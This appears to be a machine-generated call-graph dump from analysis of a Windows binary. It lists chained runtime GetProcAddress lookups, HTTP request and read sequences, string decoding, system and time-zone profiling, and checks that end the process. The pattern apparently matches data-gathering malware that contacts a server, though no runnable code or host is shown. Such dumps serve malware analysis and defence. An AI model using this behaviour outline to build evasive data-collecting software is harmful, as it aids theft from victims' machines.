4f45c0 2 API calls 14086->14087 14088 4f395b 14087->14088 14089 4f45c0 2 API calls 14088->14089 14090 4f3974 14089->14090 14091 4f45c0 2 API calls 14090->14091 14092 4f398d 14091->14092 14093 4f45c0 2 API calls 14092->14093 14094 4f39a6 14093->14094 14095 4f45c0 2 API calls 14094->14095 14096 4f39bf 14095->14096 14097 4f45c0 2 API calls 14096->14097 14098 4f39d8 14097->14098 14099 4f45c0 2 API calls 14098->14099 14100 4f39f1 14099->14100 14101 4f45c0 2 API calls 14100->14101 14102 4f3a0a 14101->14102 14103 4f45c0 2 API calls 14102->14103 14104 4f3a23 14103->14104 14105 4f45c0 2 API calls 14104->14105 14106 4f3a3c 14105->14106 14107 4f45c0 2 API calls 14106->14107 14108 4f3a55 14107->14108 14109 4f45c0 2 API calls 14108->14109 14110 4f3a6e 14109->14110 14111 4f45c0 2 API calls 14110->14111 14112 4f3a87 14111->14112 14113 4f45c0 2 API calls 14112->14113 14114 4f3aa0 14113->14114 14115 4f45c0 2 API calls 14114->14115 14116 4f3ab9 14115->14116 14117 4f45c0 2 API calls 14116->14117 14118 4f3ad2 14117->14118 14119 4f45c0 2 API calls 14118->14119 14120 4f3aeb 14119->14120 14121 4f45c0 2 API calls 14120->14121 14122 4f3b04 14121->14122 14123 4f45c0 2 API calls 14122->14123 14124 4f3b1d 14123->14124 14125 4f45c0 2 API calls 14124->14125 14126 4f3b36 14125->14126 14127 4f45c0 2 API calls 14126->14127 14128 4f3b4f 14127->14128 14129 4f45c0 2 API calls 14128->14129 14130 4f3b68 14129->14130 14131 4f45c0 2 API calls 14130->14131 14132 4f3b81 14131->14132 14133 4f45c0 2 API calls 14132->14133 14134 4f3b9a 14133->14134 14135 4f45c0 2 API calls 14134->14135 14136 4f3bb3 14135->14136 14137 4f45c0 2 API calls 14136->14137 14138 4f3bcc 14137->14138 14139 4f45c0 2 API calls 14138->14139 14140 4f3be5 14139->14140 14141 4f45c0 2 API calls 14140->14141 14142 4f3bfe 14141->14142 14143 4f45c0 2 API calls 14142->14143 14144 4f3c17 14143->14144 14145 4f45c0 2 API calls 14144->14145 14146 4f3c30 14145->14146 14147 4f45c0 2 API calls 14146->14147 14148 4f3c49 14147->14148 14149 4f45c0 2 API calls 14148->14149 14150 4f3c62 14149->14150 14151 4f45c0 2 API calls 14150->14151 14152 4f3c7b 14151->14152 14153 4f45c0 2 API calls 14152->14153 14154 4f3c94 14153->14154 14155 4f45c0 2 API calls 14154->14155 14156 4f3cad 14155->14156 14157 4f45c0 2 API calls 14156->14157 14158 4f3cc6 14157->14158 14159 4f45c0 2 API calls 14158->14159 14160 4f3cdf 14159->14160 14161 4f45c0 2 API calls 14160->14161 14162 4f3cf8 14161->14162 14163 4f45c0 2 API calls 14162->14163 14164 4f3d11 14163->14164 14165 4f45c0 2 API calls 14164->14165 14166 4f3d2a 14165->14166 14167 4f45c0 2 API calls 14166->14167 14168 4f3d43 14167->14168 14169 4f45c0 2 API calls 14168->14169 14170 4f3d5c 14169->14170 14171 4f45c0 2 API calls 14170->14171 14172 4f3d75 14171->14172 14173 4f45c0 2 API calls 14172->14173 14174 4f3d8e 14173->14174 14175 4f45c0 2 API calls 14174->14175 14176 4f3da7 14175->14176 14177 4f45c0 2 API calls 14176->14177 14178 4f3dc0 14177->14178 14179 4f45c0 2 API calls 14178->14179 14180 4f3dd9 14179->14180 14181 4f45c0 2 API calls 14180->14181 14182 4f3df2 14181->14182 14183 4f45c0 2 API calls 14182->14183 14184 4f3e0b 14183->14184 14185 4f45c0 2 API calls 14184->14185 14186 4f3e24 14185->14186 14187 4f45c0 2 API calls 14186->14187 14188 4f3e3d 14187->14188 14189 4f45c0 2 API calls 14188->14189 14190 4f3e56 14189->14190 14191 4f45c0 2 API calls 14190->14191 14192 4f3e6f 14191->14192 14193 4f45c0 2 API calls 14192->14193 14194 4f3e88 14193->14194 14195 4f45c0 2 API calls 14194->14195 14196 4f3ea1 14195->14196 14197 4f45c0 2 API calls 14196->14197 14198 4f3eba 14197->14198 14199 4f45c0 2 API calls 14198->14199 14200 4f3ed3 14199->14200 14201 4f45c0 2 API calls 14200->14201 14202 4f3eec 14201->14202 14203 4f45c0 2 API calls 14202->14203 14204 4f3f05 14203->14204 14205 4f45c0 2 API calls 14204->14205 14206 4f3f1e 14205->14206 14207 4f45c0 2 API calls 14206->14207 14208 4f3f37 14207->14208 14209 4f45c0 2 API calls 14208->14209 14210 4f3f50 14209->14210 14211 4f45c0 2 API calls 14210->14211 14212 4f3f69 14211->14212 14213 4f45c0 2 API calls 14212->14213 14214 4f3f82 14213->14214 14215 4f45c0 2 API calls 14214->14215 14216 4f3f9b 14215->14216 14217 4f45c0 2 API calls 14216->14217 14218 4f3fb4 14217->14218 14219 4f45c0 2 API calls 14218->14219 14220 4f3fcd 14219->14220 14221 4f45c0 2 API calls 14220->14221 14222 4f3fe6 14221->14222 14223 4f45c0 2 API calls 14222->14223 14224 4f3fff 14223->14224 14225 4f45c0 2 API calls 14224->14225 14226 4f4018 14225->14226 14227 4f45c0 2 API calls 14226->14227 14228 4f4031 14227->14228 14229 4f45c0 2 API calls 14228->14229 14230 4f404a 14229->14230 14231 4f45c0 2 API calls 14230->14231 14232 4f4063 14231->14232 14233 4f45c0 2 API calls 14232->14233 14234 4f407c 14233->14234 14235 4f45c0 2 API calls 14234->14235 14236 4f4095 14235->14236 14237 4f45c0 2 API calls 14236->14237 14238 4f40ae 14237->14238 14239 4f45c0 2 API calls 14238->14239 14240 4f40c7 14239->14240 14241 4f45c0 2 API calls 14240->14241 14242 4f40e0 14241->14242 14243 4f45c0 2 API calls 14242->14243 14244 4f40f9 14243->14244 14245 4f45c0 2 API calls 14244->14245 14246 4f4112 14245->14246 14247 4f45c0 2 API calls 14246->14247 14248 4f412b 14247->14248 14249 4f45c0 2 API calls 14248->14249 14250 4f4144 14249->14250 14251 4f45c0 2 API calls 14250->14251 14252 4f415d 14251->14252 14253 4f45c0 2 API calls 14252->14253 14254 4f4176 14253->14254 14255 4f45c0 2 API calls 14254->14255 14256 4f418f 14255->14256 14257 4f45c0 2 API calls 14256->14257 14258 4f41a8 14257->14258 14259 4f45c0 2 API calls 14258->14259 14260 4f41c1 14259->14260 14261 4f45c0 2 API calls 14260->14261 14262 4f41da 14261->14262 14263 4f45c0 2 API calls 14262->14263 14264 4f41f3 14263->14264 14265 4f45c0 2 API calls 14264->14265 14266 4f420c 14265->14266 14267 4f45c0 2 API calls 14266->14267 14268 4f4225 14267->14268 14269 4f45c0 2 API calls 14268->14269 14270 4f423e 14269->14270 14271 4f45c0 2 API calls 14270->14271 14272 4f4257 14271->14272 14273 4f45c0 2 API calls 14272->14273 14274 4f4270 14273->14274 14275 4f45c0 2 API calls 14274->14275 14276 4f4289 14275->14276 14277 4f45c0 2 API calls 14276->14277 14278 4f42a2 14277->14278 14279 4f45c0 2 API calls 14278->14279 14280 4f42bb 14279->14280 14281 4f45c0 2 API calls 14280->14281 14282 4f42d4 14281->14282 14283 4f45c0 2 API calls 14282->14283 14284 4f42ed 14283->14284 14285 4f45c0 2 API calls 14284->14285 14286 4f4306 14285->14286 14287 4f45c0 2 API calls 14286->14287 14288 4f431f 14287->14288 14289 4f45c0 2 API calls 14288->14289 14290 4f4338 14289->14290 14291 4f45c0 2 API calls 14290->14291 14292 4f4351 14291->14292 14293 4f45c0 2 API calls 14292->14293 14294 4f436a 14293->14294 14295 4f45c0 2 API calls 14294->14295 14296 4f4383 14295->14296 14297 4f45c0 2 API calls 14296->14297 14298 4f439c 14297->14298 14299 4f45c0 2 API calls 14298->14299 14300 4f43b5 14299->14300 14301 4f45c0 2 API calls 14300->14301 14302 4f43ce 14301->14302 14303 4f45c0 2 API calls 14302->14303 14304 4f43e7 14303->14304 14305 4f45c0 2 API calls 14304->14305 14306 4f4400 14305->14306 14307 4f45c0 2 API calls 14306->14307 14308 4f4419 14307->14308 14309 4f45c0 2 API calls 14308->14309 14310 4f4432 14309->14310 14311 4f45c0 2 API calls 14310->14311 14312 4f444b 14311->14312 14313 4f45c0 2 API calls 14312->14313 14314 4f4464 14313->14314 14315 4f45c0 2 API calls 14314->14315 14316 4f447d 14315->14316 14317 4f45c0 2 API calls 14316->14317 14318 4f4496 14317->14318 14319 4f45c0 2 API calls 14318->14319 14320 4f44af 14319->14320 14321 4f45c0 2 API calls 14320->14321 14322 4f44c8 14321->14322 14323 4f45c0 2 API calls 14322->14323 14324 4f44e1 14323->14324 14325 4f45c0 2 API calls 14324->14325 14326 4f44fa 14325->14326 14327 4f45c0 2 API calls 14326->14327 14328 4f4513 14327->14328 14329 4f45c0 2 API calls 14328->14329 14330 4f452c 14329->14330 14331 4f45c0 2 API calls 14330->14331 14332 4f4545 14331->14332 14333 4f45c0 2 API calls 14332->14333 14334 4f455e 14333->14334 14335 4f45c0 2 API calls 14334->14335 14336 4f4577 14335->14336 14337 4f45c0 2 API calls 14336->14337 14338 4f4590 14337->14338 14339 4f45c0 2 API calls 14338->14339 14340 4f45a9 14339->14340 14341 509c10 14340->14341 14342 509c20 43 API calls 14341->14342 14343 50a036 8 API calls 14341->14343 14342->14343 14344 50a146 14343->14344 14345 50a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14343->14345 14346 50a153 8 API calls 14344->14346 14347 50a216 14344->14347 14345->14344 14346->14347 14348 50a298 14347->14348 14349 50a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14347->14349 14350 50a2a5 6 API calls 14348->14350 14351 50a337 14348->14351 14349->14348 14350->14351 14352 50a344 9 API calls 14351->14352 14353 50a41f 14351->14353 14352->14353 14354 50a4a2 14353->14354 14355 50a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14353->14355 14356 50a4ab GetProcAddress GetProcAddress 14354->14356 14357 50a4dc 14354->14357 14355->14354 14356->14357 14358 50a515 14357->14358 14359 50a4e5 GetProcAddress GetProcAddress 14357->14359 14360 50a612 14358->14360 14361 50a522 10 API calls 14358->14361 14359->14358 14362 50a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14360->14362 14363 50a67d 14360->14363 14361->14360 14362->14363 14364 50a686 GetProcAddress 14363->14364 14365 50a69e 14363->14365 14364->14365 14366 50a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14365->14366 14367 505ca3 14365->14367 14366->14367 14368 4f1590 14367->14368 15487 4f1670 14368->15487 14371 50a7a0 lstrcpy 14372 4f15b5 14371->14372 14373 50a7a0 lstrcpy 14372->14373 14374 4f15c7 14373->14374 14375 50a7a0 lstrcpy 14374->14375 14376 4f15d9 14375->14376 14377 50a7a0 lstrcpy 14376->14377 14378 4f1663 14377->14378 14379 505510 14378->14379 14380 505521 14379->14380 14381 50a820 2 API calls 14380->14381 14382 50552e 14381->14382 14383 50a820 2 API calls 14382->14383 14384 50553b 14383->14384 14385 50a820 2 API calls 14384->14385 14386 505548 14385->14386 14387 50a740 lstrcpy 14386->14387 14388 505555 14387->14388 14389 50a740 lstrcpy 14388->14389 14390 505562 14389->14390 14391 50a740 lstrcpy 14390->14391 14392 50556f 14391->14392 14393 50a740 lstrcpy 14392->14393 14404 50557c 14393->14404 14394 5051f0 20 API calls 14394->14404 14395 505643 StrCmpCA 14395->14404 14396 5056a0 StrCmpCA 14397 5057dc 14396->14397 14396->14404 14398 50a8a0 lstrcpy 14397->14398 14399 5057e8 14398->14399 14400 50a820 2 API calls 14399->14400 14402 5057f6 14400->14402 14401 50a820 lstrlen lstrcpy 14401->14404 14405 50a820 2 API calls 14402->14405 14403 505856 StrCmpCA 14403->14404 14406 505991 14403->14406 14404->14394 14404->14395 14404->14396 14404->14401 14404->14403 14413 505a0b StrCmpCA 14404->14413 14414 5052c0 25 API calls 14404->14414 14418 50a740 lstrcpy 14404->14418 14419 50a7a0 lstrcpy 14404->14419 14424 4f1590 lstrcpy 14404->14424 14429 50578a StrCmpCA 14404->14429 14432 50593f StrCmpCA 14404->14432 14433 50a8a0 lstrcpy 14404->14433 14408 505805 14405->14408 14407 50a8a0 lstrcpy 14406->14407 14409 50599d 14407->14409 14410 4f1670 lstrcpy 14408->14410 14411 50a820 2 API calls 14409->14411 14431 505811 14410->14431 14412 5059ab 14411->14412 14415 50a820 2 API calls 14412->14415 14416 505a16 Sleep 14413->14416 14417 505a28 14413->14417 14414->14404 14420 5059ba 14415->14420 14416->14404 14421 50a8a0 lstrcpy 14417->14421 14418->14404 14419->14404 14422 4f1670 lstrcpy 14420->14422 14423 505a34 14421->14423 14422->14431 14425 50a820 2 API calls 14423->14425 14424->14404 14426 505a43 14425->14426 14427 50a820 2 API calls 14426->14427 14428 505a52 14427->14428 14430 4f1670 lstrcpy 14428->14430 14429->14404 14430->14431 14431->13486 14432->14404 14433->14404 14435 507553 GetVolumeInformationA 14434->14435 14436 50754c 14434->14436 14440 507591 14435->14440 14436->14435 14437 5075fc GetProcessHeap RtlAllocateHeap 14438 507628 wsprintfA 14437->14438 14439 507619 14437->14439 14442 50a740 lstrcpy 14438->14442 14441 50a740 lstrcpy 14439->14441 14440->14437 14443 505da7 14441->14443 14442->14443 14443->13507 14445 50a7a0 lstrcpy 14444->14445 14446 4f4899 14445->14446 15496 4f47b0 14446->15496 14448 4f48a5 14449 50a740 lstrcpy 14448->14449 14450 4f48d7 14449->14450 14451 50a740 lstrcpy 14450->14451 14452 4f48e4 14451->14452 14453 50a740 lstrcpy 14452->14453 14454 4f48f1 14453->14454 14455 50a740 lstrcpy 14454->14455 14456 4f48fe 14455->14456 14457 50a740 lstrcpy 14456->14457 14458 4f490b InternetOpenA StrCmpCA 14457->14458 14459 4f4944 14458->14459 14460 4f4ecb InternetCloseHandle 14459->14460 15502 508b60 14459->15502 14462 4f4ee8 14460->14462 15517 4f9ac0 CryptStringToBinaryA 14462->15517 14463 4f4963 15510 50a920 14463->15510 14466 4f4976 14468 50a8a0 lstrcpy 14466->14468 14473 4f497f 14468->14473 14469 50a820 2 API calls 14470 4f4f05 14469->14470 14471 50a9b0 4 API calls 14470->14471 14474 4f4f1b 14471->14474 14472 4f4f27 ctype 14475 50a7a0 lstrcpy 14472->14475 14477 50a9b0 4 API calls 14473->14477 14476 50a8a0 lstrcpy 14474->14476 14488 4f4f57 14475->14488 14476->14472 14478 4f49a9 14477->14478 14479 50a8a0 lstrcpy 14478->14479 14480 4f49b2 14479->14480 14481 50a9b0 4 API calls 14480->14481 14482 4f49d1 14481->14482 14483 50a8a0 lstrcpy 14482->14483 14484 4f49da 14483->14484 14485 50a920 3 API calls 14484->14485 14486 4f49f8 14485->14486 14487 50a8a0 lstrcpy 14486->14487 14489 4f4a01 14487->14489 14488->13510 14490 50a9b0 4 API calls 14489->14490 14491 4f4a20 14490->14491 14492 50a8a0 lstrcpy 14491->14492 14493 4f4a29 14492->14493 14494 50a9b0 4 API calls 14493->14494 14495 4f4a48 14494->14495 14496 50a8a0 lstrcpy 14495->14496 14497 4f4a51 14496->14497 14498 50a9b0 4 API calls 14497->14498 14499 4f4a7d 14498->14499 14500 50a920 3 API calls 14499->14500 14501 4f4a84 14500->14501 14502 50a8a0 lstrcpy 14501->14502 14503 4f4a8d 14502->14503 14504 4f4aa3 InternetConnectA 14503->14504 14504->14460 14505 4f4ad3 HttpOpenRequestA 14504->14505 14507 4f4ebe InternetCloseHandle 14505->14507 14508 4f4b28 14505->14508 14507->14460 14509 50a9b0 4 API calls 14508->14509 14510 4f4b3c 14509->14510 14511 50a8a0 lstrcpy 14510->14511 14512 4f4b45 14511->14512 14513 50a920 3 API calls 14512->14513 14514 4f4b63 14513->14514 14515 50a8a0 lstrcpy 14514->14515 14516 4f4b6c 14515->14516 14517 50a9b0 4 API calls 14516->14517 14518 4f4b8b 14517->14518 14519 50a8a0 lstrcpy 14518->14519 14520 4f4b94 14519->14520 14521 50a9b0 4 API calls 14520->14521 14522 4f4bb5 14521->14522 14523 50a8a0 lstrcpy 14522->14523 14524 4f4bbe 14523->14524 14525 50a9b0 4 API calls 14524->14525 14526 4f4bde 14525->14526 14527 50a8a0 lstrcpy 14526->14527 14528 4f4be7 14527->14528 14529 50a9b0 4 API calls 14528->14529 14530 4f4c06 14529->14530 14531 50a8a0 lstrcpy 14530->14531 14532 4f4c0f 14531->14532 14533 50a920 3 API calls 14532->14533 14534 4f4c2d 14533->14534 14535 50a8a0 lstrcpy 14534->14535 14536 4f4c36 14535->14536 14537 50a9b0 4 API calls 14536->14537 14538 4f4c55 14537->14538 14539 50a8a0 lstrcpy 14538->14539 14540 4f4c5e 14539->14540 14541 50a9b0 4 API calls 14540->14541 14542 4f4c7d 14541->14542 14543 50a8a0 lstrcpy 14542->14543 14544 4f4c86 14543->14544 14545 50a920 3 API calls 14544->14545 14546 4f4ca4 14545->14546 14547 50a8a0 lstrcpy 14546->14547 14548 4f4cad 14547->14548 14549 50a9b0 4 API calls 14548->14549 14550 4f4ccc 14549->14550 14551 50a8a0 lstrcpy 14550->14551 14552 4f4cd5 14551->14552 14553 50a9b0 4 API calls 14552->14553 14554 4f4cf6 14553->14554 14555 50a8a0 lstrcpy 14554->14555 14556 4f4cff 14555->14556 14557 50a9b0 4 API calls 14556->14557 14558 4f4d1f 14557->14558 14559 50a8a0 lstrcpy 14558->14559 14560 4f4d28 14559->14560 14561 50a9b0 4 API calls 14560->14561 14562 4f4d47 14561->14562 14563 50a8a0 lstrcpy 14562->14563 14564 4f4d50 14563->14564 14565 50a920 3 API calls 14564->14565 14566 4f4d6e 14565->14566 14567 50a8a0 lstrcpy 14566->14567 14568 4f4d77 14567->14568 14569 50a740 lstrcpy 14568->14569 14570 4f4d92 14569->14570 14571 50a920 3 API calls 14570->14571 14572 4f4db3 14571->14572 14573 50a920 3 API calls 14572->14573 14574 4f4dba 14573->14574 14575 50a8a0 lstrcpy 14574->14575 14576 4f4dc6 14575->14576 14577 4f4de7 lstrlen 14576->14577 14578 4f4dfa 14577->14578 14579 4f4e03 lstrlen 14578->14579 15516 50aad0 14579->15516 14581 4f4e13 HttpSendRequestA 14582 4f4e32 InternetReadFile 14581->14582 14583 4f4e67 InternetCloseHandle 14582->14583 14588 4f4e5e 14582->14588 14586 50a800 14583->14586 14585 50a9b0 4 API calls 14585->14588 14586->14507 14587 50a8a0 lstrcpy 14587->14588 14588->14582 14588->14583 14588->14585 14588->14587 15523 50aad0 14589->15523 14591 5017c4 StrCmpCA 14592 5017cf ExitProcess 14591->14592 14604 5017d7 14591->14604 14593 5019c2 14593->13512 14594 501970 StrCmpCA 14594->14604 14595 5018f1 StrCmpCA 14595->14604 14596 501951 StrCmpCA 14596->14604 14597 501932 StrCmpCA 14597->14604 14598 501913 StrCmpCA 14598->14604 14599 50185d StrCmpCA 14599->14604 14600 50187f StrCmpCA 14600->14604 14601 5018ad StrCmpCA 14601->14604 14602 5018cf StrCmpCA 14602->14604 14603 50a820 lstrlen lstrcpy 14603->14604 14604->14593 14604->14594 14604->14595 14604->14596 14604->14597 14604->14598 14604->14599 14604->14600 14604->14601 14604->14602 14604->14603 14606 50a7a0 lstrcpy 14605->14606 14607 4f5979 14606->14607 14608 4f47b0 2 API calls 14607->14608 14609 4f5985 14608->14609 14610 50a740 lstrcpy 14609->14610 14611 4f59ba 14610->14611 14612 50a740 lstrcpy 14611->14612 14613 4f59c7 14612->14613 14614 50a740 lstrcpy 14613->14614 14615 4f59d4 14614->14615 14616 50a740 lstrcpy 14615->14616 14617 4f59e1 14616->14617 14618 50a740 lstrcpy 14617->14618 14619 4f59ee InternetOpenA StrCmpCA 14618->14619 14620 4f5a1d 14619->14620 14621 4f5fc3 InternetCloseHandle 14620->14621 14622 508b60 3 API calls 14620->14622 14623 4f5fe0 14621->14623 14624 4f5a3c 14622->14624 14626 4f9ac0 4 API calls 14623->14626 14625 50a920 3 API calls 14624->14625 14627 4f5a4f 14625->14627 14628 4f5fe6 14626->14628 14629 50a8a0 lstrcpy 14627->14629 14630 50a820 2 API calls 14628->14630 14632 4f601f ctype 14628->14632 14634 4f5a58 14629->14634 14631 4f5ffd 14630->14631 14633 50a9b0 4 API calls 14631->14633 14636 50a7a0 lstrcpy 14632->14636 14635 4f6013 14633->14635 14638 50a9b0 4 API calls 14634->14638 14637 50a8a0 lstrcpy 14635->14637 14646 4f604f 14636->14646 14637->14632 14639 4f5a82 14638->14639 14640 50a8a0 lstrcpy 14639->14640 14641 4f5a8b 14640->14641 14642 50a9b0 4 API calls 14641->14642 14643 4f5aaa 14642->14643 14644 50a8a0 lstrcpy 14643->14644 14645 4f5ab3 14644->14645 14647 50a920 3 API calls 14645->14647 14646->13518 14648 4f5ad1 14647->14648 14649 50a8a0 lstrcpy 14648->14649 14650 4f5ada 14649->14650 14651 50a9b0 4 API calls 14650->14651 14652 4f5af9 14651->14652 14653 50a8a0 lstrcpy 14652->14653 14654 4f5b02 14653->14654 14655 50a9b0 4 API calls 14654->14655 14656 4f5b21 14655->14656 14657 50a8a0 lstrcpy 14656->14657 14658 4f5b2a 14657->14658 14659 50a9b0 4 API calls 14658->14659 14660 4f5b56 14659->14660 14661 50a920 3 API calls 14660->14661 14662 4f5b5d 14661->14662 14663 50a8a0 lstrcpy 14662->14663 14664 4f5b66 14663->14664 14665 4f5b7c InternetConnectA 14664->14665 14665->14621 14666 4f5bac HttpOpenRequestA 14665->14666 14668 4f5c0b 14666->14668 14669 4f5fb6 InternetCloseHandle 14666->14669 14670 50a9b0 4 API calls 14668->14670 14669->14621 14671 4f5c1f 14670->14671 14672 50a8a0 lstrcpy 14671->14672 14673 4f5c28 14672->14673 14674 50a920 3 API calls 14673->14674 14675 4f5c46 14674->14675 14676 50a8a0 lstrcpy 14675->14676 14677 4f5c4f 14676->14677 14678 50a9b0 4 API calls 14677->14678 14679 4f5c6e 14678->14679 14680 50a8a0 lstrcpy 14679->14680 14681 4f5c77 14680->14681 14682 50a9b0 4 API calls 14681->14682 14683 4f5c98 14682->14683 14684 50a8a0 lstrcpy 14683->14684 14685 4f5ca1 14684->14685 14686 50a9b0 4 API calls 14685->14686 14687 4f5cc1 14686->14687 14688 50a8a0 lstrcpy 14687->14688 14689 4f5cca 14688->14689 14690 50a9b0 4 API calls 14689->14690 14691 4f5ce9 14690->14691 14692 50a8a0 lstrcpy 14691->14692 14693 4f5cf2 14692->14693 14694 50a920 3 API calls 14693->14694 14695 4f5d10 14694->14695 14696 50a8a0 lstrcpy 14695->14696 14697 4f5d19 14696->14697 14698 50a9b0 4 API calls 14697->14698 14699 4f5d38 14698->14699 14700 50a8a0 lstrcpy 14699->14700 14701 4f5d41 14700->14701 14702 50a9b0 4 API calls 14701->14702 14703 4f5d60 14702->14703 14704 50a8a0 lstrcpy 14703->14704 14705 4f5d69 14704->14705 14706 50a920 3 API calls 14705->14706 14707 4f5d87 14706->14707 14708 50a8a0 lstrcpy 14707->14708 14709 4f5d90 14708->14709 14710 50a9b0 4 API calls 14709->14710 14711 4f5daf 14710->14711 14712 50a8a0 lstrcpy 14711->14712 14713 4f5db8 14712->14713 14714 50a9b0 4 API calls 14713->14714 14715 4f5dd9 14714->14715 14716 50a8a0 lstrcpy 14715->14716 14717 4f5de2 14716->14717 14718 50a9b0 4 API calls 14717->14718 14719 4f5e02 14718->14719 14720 50a8a0 lstrcpy 14719->14720 14721 4f5e0b 14720->14721 14722 50a9b0 4 API calls 14721->14722 14723 4f5e2a 14722->14723 14724 50a8a0 lstrcpy 14723->14724 14725 4f5e33 14724->14725 14726 50a920 3 API calls 14725->14726 14727 4f5e54 14726->14727 14728 50a8a0 lstrcpy 14727->14728 14729 4f5e5d 14728->14729 14730 4f5e70 lstrlen 14729->14730 15524 50aad0 14730->15524 14732 4f5e81 lstrlen GetProcessHeap RtlAllocateHeap 15525 50aad0 14732->15525 14734 4f5eae lstrlen 14735 4f5ebe 14734->14735 14736 4f5ed7 lstrlen 14735->14736 14737 4f5ee7 14736->14737 14738 4f5ef0 lstrlen 14737->14738 14739 4f5f03 14738->14739 14740 4f5f1a lstrlen 14739->14740 15526 50aad0 14740->15526 14742 4f5f2a HttpSendRequestA 14743 4f5f35 InternetReadFile 14742->14743 14744 4f5f6a InternetCloseHandle 14743->14744 14748 4f5f61 14743->14748 14744->14669 14746 50a9b0 4 API calls 14746->14748 14747 50a8a0 lstrcpy 14747->14748 14748->14743 14748->14744 14748->14746 14748->14747 14751 501077 14749->14751 14750 501151 14750->13520 14751->14750 14752 50a820 lstrlen lstrcpy 14751->14752 14752->14751 14755 500db7 14753->14755 14754 500f17 14754->13528 14755->14754 14756 500ea4 StrCmpCA 14755->14756 14757 500e27 StrCmpCA 14755->14757 14758 500e67 StrCmpCA 14755->14758 14759 50a820 lstrlen lstrcpy 14755->14759 14756->14755 14757->14755 14758->14755 14759->14755 14762 500f67 14760->14762 14761 501044 14761->13536 14762->14761 14763 500fb2 StrCmpCA 14762->14763 14764 50a820 lstrlen lstrcpy 14762->14764 14763->14762 14764->14762 14766 50a740 lstrcpy 14765->14766 14767 501a26 14766->14767 14768 50a9b0 4 API calls 14767->14768 14769 501a37 14768->14769 14770 50a8a0 lstrcpy 14769->14770 14771 501a40 14770->14771 14772 50a9b0 4 API calls 14771->14772 14773 501a5b 14772->14773 14774 50a8a0 lstrcpy 14773->14774 14775 501a64 14774->14775 14776 50a9b0 4 API calls 14775->14776 14777 501a7d 14776->14777 14778 50a8a0 lstrcpy 14777->14778 14779 501a86 14778->14779 14780 50a9b0 4 API calls 14779->14780 14781 501aa1 14780->14781 14782 50a8a0 lstrcpy 14781->14782 14783 501aaa 14782->14783 14784 50a9b0 4 API calls 14783->14784 14785 501ac3 14784->14785 14786 50a8a0 lstrcpy 14785->14786 14787 501acc 14786->14787 14788 50a9b0 4 API calls 14787->14788 14789 501ae7 14788->14789 14790 50a8a0 lstrcpy 14789->14790 14791 501af0 14790->14791 14792 50a9b0 4 API calls 14791->14792 14793 501b09 14792->14793 14794 50a8a0 lstrcpy 14793->14794 14795 501b12 14794->14795 14796 50a9b0 4 API calls 14795->14796 14797 501b2d 14796->14797 14798 50a8a0 lstrcpy 14797->14798 14799 501b36 14798->14799 14800 50a9b0 4 API calls 14799->14800 14801 501b4f 14800->14801 14802 50a8a0 lstrcpy 14801->14802 14803 501b58 14802->14803 14804 50a9b0 4 API calls 14803->14804 14805 501b76 14804->14805 14806 50a8a0 lstrcpy 14805->14806 14807 501b7f 14806->14807 14808 507500 6 API calls 14807->14808 14809 501b96 14808->14809 14810 50a920 3 API calls 14809->14810 14811 501ba9 14810->14811 14812 50a8a0 lstrcpy 14811->14812 14813 501bb2 14812->14813 14814 50a9b0 4 API calls 14813->14814 14815 501bdc 14814->14815 14816 50a8a0 lstrcpy 14815->14816 14817 501be5 14816->14817 14818 50a9b0 4 API calls 14817->14818 14819 501c05 14818->14819 14820 50a8a0 lstrcpy 14819->14820 14821 501c0e 14820->14821 15527 507690 GetProcessHeap RtlAllocateHeap 14821->15527 14824 50a9b0 4 API calls 14825 501c2e 14824->14825 14826 50a8a0 lstrcpy 14825->14826 14827 501c37 14826->14827 14828 50a9b0 4 API calls 14827->14828 14829 501c56 14828->14829 14830 50a8a0 lstrcpy 14829->14830 14831 501c5f 14830->14831 14832 50a9b0 4 API calls 14831->14832 14833 501c80 14832->14833 14834 50a8a0 lstrcpy 14833->14834 14835 501c89 14834->14835 15534 5077c0 GetCurrentProcess IsWow64Process 14835->15534 14838 50a9b0 4 API calls 14839 501ca9 14838->14839 14840 50a8a0 lstrcpy 14839->14840 14841 501cb2 14840->14841 14842 50a9b0 4 API calls 14841->14842 14843 501cd1 14842->14843 14844 50a8a0 lstrcpy 14843->14844 14845 501cda 14844->14845 14846 50a9b0 4 API calls 14845->14846 14847 501cfb 14846->14847 14848 50a8a0 lstrcpy 14847->14848 14849 501d04 14848->14849 14850 507850 3 API calls 14849->14850 14851 501d14 14850->14851 14852 50a9b0 4 API calls 14851->14852 14853 501d24 14852->14853 14854 50a8a0 lstrcpy 14853->14854 14855 501d2d 14854->14855 14856 50a9b0 4 API calls 14855->14856 14857 501d4c 14856->14857 14858 50a8a0 lstrcpy 14857->14858 14859 501d55 14858->14859 14860 50a9b0 4 API calls 14859->14860 14861 501d75 14860->14861 14862 50a8a0 lstrcpy 14861->14862 14863 501d7e 14862->14863 14864 5078e0 3 API calls 14863->14864 14865 501d8e 14864->14865 14866 50a9b0 4 API calls 14865->14866 14867 501d9e 14866->14867 14868 50a8a0 lstrcpy 14867->14868 14869 501da7 14868->14869 14870 50a9b0 4 API calls 14869->14870 14871 501dc6 14870->14871 14872 50a8a0 lstrcpy 14871->14872 14873 501dcf 14872->14873 14874 50a9b0 4 API calls 14873->14874 14875 501df0 14874->14875 14876 50a8a0 lstrcpy 14875->14876 14877 501df9 14876->14877 15536 507980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14877->15536 14880 50a9b0 4 API calls 14881 501e19 14880->14881 14882 50a8a0 lstrcpy 14881->14882 14883 501e22 14882->14883 14884 50a9b0 4 API calls 14883->14884 14885 501e41 14884->14885 14886 50a8a0 lstrcpy 14885->14886 14887 501e4a 14886->14887 14888 50a9b0 4 API calls 14887->14888 14889 501e6b 14888->14889 14890 50a8a0 lstrcpy 14889->14890 14891 501e74 14890->14891 15538 507a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14891->15538 14894 50a9b0 4 API calls 14895 501e94 14894->14895 14896 50a8a0 lstrcpy 14895->14896 14897 501e9d 14896->14897 14898 50a9b0 4 API calls 14897->14898 14899 501ebc 14898->14899 14900 50a8a0 lstrcpy 14899->14900 14901 501ec5 14900->14901 14902 50a9b0 4 API calls 14901->14902 14903 501ee5 14902->14903 14904 50a8a0 lstrcpy 14903->14904 14905 501eee 